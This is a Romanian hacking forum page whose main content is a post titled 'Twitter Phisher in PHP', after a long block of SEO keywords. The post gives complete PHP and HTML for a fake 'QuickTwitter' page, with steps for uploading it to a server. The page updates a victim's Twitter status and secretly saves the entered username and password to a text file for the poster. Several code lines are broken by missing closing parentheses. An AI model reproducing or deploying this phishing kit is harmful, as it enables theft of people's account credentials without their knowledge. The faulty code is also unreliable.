www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum
Lista Forumurilor Pe Tematici
www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat.
Nou pe simpatie:
GeorgianaIoana pe Simpatie.ro
Femeie
25 ani
Bucuresti
cauta Barbat
25 - 63 ani
www.Hacking-Romania.com / Hacking T00ls / Twitter Phisher in PHP  
Autor
Mesaj Pagini: 1
jocker
HACKING~TEAM

Inregistrat: acum 16 ani
Postari: 910
Message.php
Code:


<?php
// Set username and password
$username = $_POST['username'];
$password = $_POST['password'];
// The message you want to send
$message = $_POST['message'];
// The twitter API address
$url = 'http://twitter.com/statuses/update.xml';
// Alternative JSON version
// $url = 'http://twitter.com/statuses/update.json';
// Set up and execute the curl process
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, "$url";
curl_setopt($curl_handle, CURLOPT_CONNECTTIMEOUT, 2);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_handle, CURLOPT_POST, 1);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, "status=$message";
curl_setopt($curl_handle, CURLOPT_USERPWD, "$username:$password";
$buffer = curl_exec($curl_handle);
curl_close($curl_handle);
// check for success or failure
if (empty($buffer)) {
    echo 'Fail, the Twitter AIP must be down';
} else {
    echo 'Done,';
}

//FileSaving
$myFile = "dude.txt";
$fh = fopen($myFile, 'w') or die("can't open file";
$stringData = $_POST['username'];
fwrite($fh, $stringData);
$stringData = $_POST['password'];
fwrite($fh, $stringData);
fclose($fh);
?>

----------------------------
Index.html
Code:

<html>
<head>
<style type="text/css">
<!--
body {
background-color: #9FEAF0;
}
</style>
<title>QuickTwitter</title>
</head>
<body>

<form name="input" action="message.php" method="post"
onReset="return confirm('Last Chance, do you really want to reset?') ">
Username
<input type="text" name="username">
<br>
Password:
<input type="password" name="password">
<br>
Message:
<input type="text" name="message">
<br>
<input type="submit" value="Submit">
<INPUT TYPE=RESET value="Reset">
</form>
</body>
</html>


nstrutctions:

Copy the code and save as thr right files types
Upload to a server
Make a text file called "dude" in the directory with message.php
Done
-----------------------------
What it Does:

It updates a person's Twitter status. They just have to type in their password and username.
What they dont know is that it saves the password and username to a text file "dude.txt" and now you have a person's password and username
------------------------------
Tut by BobPart. Coded by BobPart. By BobPart

twitter phisher php <?php// set username and the message you want the twitter api json version//

5.4KB


_______________________________________
[img]http://i320.photobucket.com/albums/nn324/pad_vlad/moderator-3.gif[/img]

pus acum 16 ani
   
Pagini: 1  

Mergi la